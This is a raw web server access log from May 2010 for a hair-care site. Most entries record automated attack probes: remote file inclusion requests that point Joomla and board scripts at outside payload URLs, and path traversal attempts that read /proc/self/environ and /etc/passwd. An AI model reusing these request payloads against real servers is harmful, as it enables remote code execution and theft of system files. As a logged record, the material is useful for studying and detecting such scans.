192.220.118.1 - - [30/May/2010:21:18:11 -0700] "GET /index.php?option=com_fabrik&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
192.220.118.1 - - [30/May/2010:21:18:11 -0700] "GET /logs//index.php?option=com_fabrik&controller=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.61.185.200 - - [30/May/2010:21:20:30 -0700] "GET /logs/errors.php?error=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.61.185.200 - - [30/May/2010:21:20:34 -0700] "GET /errors.php?error=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.61.185.200 - - [30/May/2010:21:20:36 -0700] "GET /logs/access_100419.log/errors.php?error=http://francophonie.utm.md/fx29id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
91.121.201.191 - - [30/May/2010:21:20:49 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.201.191 - - [30/May/2010:21:20:49 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
91.121.201.191 - - [30/May/2010:21:20:49 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "growlonghairfast.com"
77.88.25.28 - - [30/May/2010:21:21:12 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6548 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
120.50.40.133 - - [30/May/2010:21:28:59 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
120.50.40.133 - - [30/May/2010:21:29:00 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
120.50.40.133 - - [30/May/2010:21:29:00 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
200.43.180.250 - - [30/May/2010:21:29:24 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
67.18.167.170 - - [30/May/2010:21:34:17 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.18.167.170 - - [30/May/2010:21:34:19 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
208.110.132.7 - - [30/May/2010:21:38:33 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.110.132.7 - - [30/May/2010:21:38:33 -0700] "GET /logs//index.php?option=com_fabrik&controller=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.110.132.7 - - [30/May/2010:21:38:33 -0700] "GET /index.php?option=com_fabrik&controller=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.110.132.7 - - [30/May/2010:21:38:40 -0700] "GET /index.php?option=com_fabrik&controller=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.110.132.7 - - [30/May/2010:21:38:40 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.110.132.7 - - [30/May/2010:21:38:41 -0700] "GET /logs//index.php?option=com_fabrik&controller=http://banderasbayportal.com/modules/mod_archive/.asu/P1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:21:41:05 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:21:41:05 -0700] "GET /logs/access_100412.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:21:41:05 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:21:41:05 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:21:41:06 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:21:41:06 -0700] "GET /logs/access_100412.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:21:42:13 -0700] "GET /logs/access_100322.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
81.92.204.67 - - [30/May/2010:21:42:14 -0700] "GET /logs/access_100322.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.howtolisten.kr/lct/exam3/81/auto1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [30/May/2010:21:43:31 -0700] "GET /freehairsecretsphp/viewtopic.php?p=13698 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
208.113.195.20 - - [30/May/2010:21:49:14 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [30/May/2010:21:49:14 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [30/May/2010:21:49:15 -0700] "GET /logs/access_100125.log//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [30/May/2010:21:49:21 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [30/May/2010:21:49:21 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [30/May/2010:21:49:21 -0700] "GET /logs/access_100125.log//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [30/May/2010:21:50:26 -0700] "GET /freehairsecretsphp/viewtopic.php?p=1560 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
208.113.195.20 - - [30/May/2010:21:50:28 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.113.195.20 - - [30/May/2010:21:50:28 -0700] "GET /logs/access.log//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.113.195.20 - - [30/May/2010:21:50:28 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.136.121.230 - - [30/May/2010:21:50:30 -0700] "GET /logs/access_100412.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:21:50:30 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:21:50:30 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [30/May/2010:21:50:38 -0700] "GET /logs/access.log//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.113.195.20 - - [30/May/2010:21:50:38 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
208.113.195.20 - - [30/May/2010:21:50:38 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.136.121.230 - - [30/May/2010:21:50:57 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [30/May/2010:21:51:53 -0700] "GET /index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [30/May/2010:21:51:53 -0700] "GET /logs//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [30/May/2010:21:51:53 -0700] "GET /logs/access_100222.log%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.113.195.20 - - [30/May/2010:21:52:19 -0700] "GET /logs/access_100201.log%20%20//index.php?option=com_virtuemart&Itemid=&mosConfig.absolute.path=http://firmantuhan-kesukaanku.com/id-1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
67.18.167.170 - - [30/May/2010:21:55:08 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.18.167.170 - - [30/May/2010:21:55:08 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.18.167.170 - - [30/May/2010:21:55:08 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.18.167.170 - - [30/May/2010:21:55:38 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.18.167.170 - - [30/May/2010:21:55:38 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
67.18.167.170 - - [30/May/2010:21:55:39 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:21:57:53 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:21:57:53 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:21:57:54 -0700] "GET /logs/access_100503.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:21:58:08 -0700] "GET /logs/access_100510.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [30/May/2010:21:58:09 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [30/May/2010:21:58:09 -0700] "GET /logs/access_100125.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [30/May/2010:21:58:09 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
60.50.211.11 - - [30/May/2010:21:58:25 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:21:58:54 -0700] "GET /logs/access_100412.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [30/May/2010:21:59:00 -0700] "GET /logs/access_100125.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [30/May/2010:21:59:00 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [30/May/2010:21:59:00 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.7.198.40 - - [30/May/2010:21:59:06 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.7.198.40 - - [30/May/2010:21:59:06 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.7.198.40 - - [30/May/2010:21:59:06 -0700] "GET /logs/access_100125.log%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.7.198.40 - - [30/May/2010:21:59:37 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.7.198.40 - - [30/May/2010:21:59:37 -0700] "GET /logs/access_100322.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.7.198.40 - - [30/May/2010:21:59:37 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [30/May/2010:21:59:51 -0700] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [30/May/2010:21:59:51 -0700] "GET /bbs//skin/ggambo7002_board/write.php?dir=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
207.55.247.185 - - [30/May/2010:21:59:51 -0700] "GET /logs/access_100322.log//bbs//skin/ggambo7002_board/write.php?dir=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
200.43.180.250 - - [30/May/2010:22:00:09 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
200.43.180.250 - - [30/May/2010:22:00:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
200.43.180.250 - - [30/May/2010:22:00:11 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
77.88.25.28 - - [30/May/2010:22:03:40 -0700] "GET /logs/access_090921.log HTTP/1.1" 404 - "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
174.142.68.135 - - [30/May/2010:22:04:23 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:22:04:35 -0700] "GET /logs/access_100426.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:22:04:37 -0700] "GET /logs/access_100322.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [30/May/2010:22:07:22 -0700] "GET /freehairsecretsphp/viewtopic.php?p=12622 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
75.136.121.230 - - [30/May/2010:22:08:19 -0700] "GET /logs/access_100412.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
75.136.121.230 - - [30/May/2010:22:08:27 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://www.sharon.or.kr/data/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.142.68.135 - - [30/May/2010:22:15:11 -0700] "GET /logs/access.log/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.142.68.135 - - [30/May/2010:22:15:11 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
174.142.68.135 - - [30/May/2010:22:15:11 -0700] "GET /logs/index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.834" "growlonghairfast.com"
77.88.25.28 - - [30/May/2010:22:15:25 -0700] "GET /freehairsecretsphp/viewtopic.php?p=6382 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
110.45.144.176 - - [30/May/2010:22:16:39 -0700] "GET /////?base_folder=http://www.vanvucht.nl/TNG/documents/idxx.txt?? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.144.176 - - [30/May/2010:22:16:39 -0700] "GET /logs/access_100412.log%20%20//////?base_folder=http://www.vanvucht.nl/TNG/documents/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.144.176 - - [30/May/2010:22:16:39 -0700] "GET /logs//////?base_folder=http://www.vanvucht.nl/TNG/documents/idxx.txt?? HTTP/1.1" 200 5666 "-" "Mozilla/5.0" "growlonghairfast.com"
64.15.156.75 - - [30/May/2010:22:16:45 -0700] "GET /////?base_folder=http://www.vanvucht.nl/TNG/documents/idxx.txt?? HTTP/1.1" 200 929 "-" "Mozilla/5.0" "growlonghairfast.com"
64.15.156.75 - - [30/May/2010:22:16:45 -0700] "GET /logs/access_100412.log%20%20//////?base_folder=http://www.vanvucht.nl/TNG/documents/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.15.156.75 - - [30/May/2010:22:16:45 -0700] "GET /logs//////?base_folder=http://www.vanvucht.nl/TNG/documents/idxx.txt?? HTTP/1.1" 200 5666 "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.94.213 - - [30/May/2010:22:17:14 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "-" "growlonghairfast.com"
64.15.156.75 - - [30/May/2010:22:17:27 -0700] "GET /logs/access.log%20%20//////?base_folder=http://www.vanvucht.nl/TNG/documents/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:22:18:09 -0700] "GET /logs/access_091214.log//main.php?appserv_root=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:22:18:09 -0700] "GET /logs//main.php?appserv_root=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:22:18:09 -0700] "GET /main.php?appserv_root=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "growlonghairfast.com"
110.45.144.176 - - [30/May/2010:22:18:35 -0700] "GET /logs/access.log%20%20//////?base_folder=http://www.vanvucht.nl/TNG/documents/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
220.181.94.213 - - [30/May/2010:22:18:49 -0700] "GET /freehairsecretsphp/viewtopic.php?p=18518 HTTP/1.1" 200 349 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:22:19:07 -0700] "GET /logs/access_091214.log//main.php?appserv_root=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:22:19:07 -0700] "GET /main.php?appserv_root=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "growlonghairfast.com"
213.128.84.14 - - [30/May/2010:22:19:08 -0700] "GET /logs//main.php?appserv_root=http://www.howtolisten.kr/bbs/data/webtoon/idrose.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "growlonghairfast.com"
110.45.144.176 - - [30/May/2010:22:20:23 -0700] "GET /logs/access_100412.log//////?base_folder=http://www.vanvucht.nl/TNG/documents/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
110.45.144.176 - - [30/May/2010:22:20:29 -0700] "GET /logs/access.log//////?base_folder=http://www.vanvucht.nl/TNG/documents/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.15.156.75 - - [30/May/2010:22:22:03 -0700] "GET /logs/access_100412.log//////?base_folder=http://www.vanvucht.nl/TNG/documents/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.15.156.75 - - [30/May/2010:22:22:21 -0700] "GET /logs/access.log//////?base_folder=http://www.vanvucht.nl/TNG/documents/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
60.50.211.11 - - [30/May/2010:22:23:19 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
60.50.211.11 - - [30/May/2010:22:23:22 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
60.50.211.11 - - [30/May/2010:22:23:26 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
77.88.25.28 - - [30/May/2010:22:26:09 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15312 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
77.88.25.28 - - [30/May/2010:22:29:47 -0700] "GET /freehairsecretsphp/viewtopic.php?p=15068 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
64.251.10.117 - - [30/May/2010:22:32:43 -0700] "GET /logs/access_100412.log//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:32:43 -0700] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
64.251.10.117 - - [30/May/2010:22:32:43 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.oheliporto.com/includes/domit/id1? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
